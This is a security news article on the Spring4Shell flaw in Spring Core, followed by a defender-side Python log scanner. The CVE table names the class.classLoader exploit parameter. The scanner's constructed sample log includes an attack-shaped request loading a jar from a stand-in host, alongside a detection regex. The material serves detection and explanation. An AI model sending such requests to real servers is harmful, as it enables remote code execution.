Spring4Shell: No need to panic, but mitigations are advised (Security News, March 2022)
Security teams around the world got another shock on Thursday when news began circulating online that a PoC for an unauthenticated RCE zero-day vulnerability in Spring Core, a massively popular framework for building modern Java-based enterprise applications, had been disclosed.
Thanks to the work of many security researchers, the situation is a bit clearer today and there's no need to panic just yet: unlike Log4Shell, this new flaw - which has no official CVE yet and is currently nicknamed Spring4Shell - seems to be exploitable only in certain configurations.
First and foremost: Spring4Shell is not the recently patched RCE vulnerability in the Spring Cloud Function library.
According to researchers at Praetorian, Spring4Shell is a bypass of an incomplete patch for CVE-2010-1622, an old code injection vulnerability in the Spring Core Framework, and it affects Spring Core running on Java Development Kit (JDK) version 9 or later.
"When zero day exploits like Spring4Shell come to light, organizations immediately are thrust into panic mode, scrambling to determine the potential blast radius of the vulnerability. Given the broad use of Apache Tomcat by developers, this remote code execution vulnerability has huge potential impact. Security teams need to immediately understand what software and devices might be affected and identify whether there are any vulnerable devices in their environment. This can be remarkably challenging because many organizations struggle to maintain an up-to-date inventory of devices, let alone possess the ability to detect software types and versions running on those devices," says Jeff Costlow, CISO at ExtraHop.
"We know at this point that the remote code execution vulnerability is present in the Java Spring framework, but it may also be present in other Java applications. It affects Tomcat, a very common connector that joins together a web server and the Java application. We suspect there may be other vulnerable applications, but are focusing on the attacks that are in the wild. We have reports of scanning already for this vulnerability so it is only a matter of time before a fully weaponized PoC is leveraged."
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | RISK
---|---|---|---
2010-06-21 | CVE-2010-1622 | Code Injection vulnerability in multiple products: SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing `class.classLoader.URLs[0]=jar:` followed by a URL of a crafted .jar file. | 0.0
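As an added example (not code from the article, from Praetorian or from the Spring project), here is a defender-side check that scans web access logs for the request shape the CVE-2010-1622 entry above describes, generalised to any data-binding parameter name that walks through a `class`/`Class` property segment; this also covers the JDK 9+ `class.module.classLoader` path, which is what the incomplete-patch bypass discussed earlier reaches. The log lines are constructed, and the segment-matching rule is my own assumption of a reasonable detection heuristic.

```python
# Added example: flag HTTP requests whose parameter names traverse a Spring
# bean property path into the class loader (the CVE-2010-1622 shape
# "class.classLoader..." and the JDK 9+ "class.module.classLoader..." form).
import re
from urllib.parse import parse_qsl, urlsplit

# A dotted/indexed segment that is exactly "class" or "Class" (not "className",
# not "classes[0]"). Assumed heuristic; it does not prove exploitation.
_CLASS_SEGMENT = re.compile(r'(?:^|[.\[\]])[cC]lass(?:$|[.\[\]])')

# Minimal Common Log Format prefix: client, identd, user, timestamp, request line.
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')


def suspicious_params(query: str) -> list[str]:
    """Return parameter names in a query string that touch a class/classLoader path."""
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if _CLASS_SEGMENT.search(name)]


def scan_access_log(lines):
    """Yield (client_ip, path, [flagged parameter names]) for each hit.

    Caveat: access logs only record the query string, so parameters sent in a
    POST body are invisible here; those need WAF or request-body inspection.
    """
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue  # not a log line we understand
        target = m.group("target")
        flagged = suspicious_params(urlsplit(target).query)
        if flagged:
            hits.append((m.group("ip"), target.split("?", 1)[0], flagged))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, placeholder values).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Mar/2022:10:12:01 +0000] "GET /app/orders?id=42&className=Foo HTTP/1.1" 200 512',
    '203.0.113.7 - - [31/Mar/2022:10:12:03 +0000] "GET /app/orders?class.classLoader.URLs%5B0%5D=jar:http://example.invalid/x.jar!/ HTTP/1.1" 500 0',
    '203.0.113.9 - - [31/Mar/2022:10:12:05 +0000] "GET /app/orders?class.module.classLoader.foo=bar HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for ip, path, params in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {params}")
```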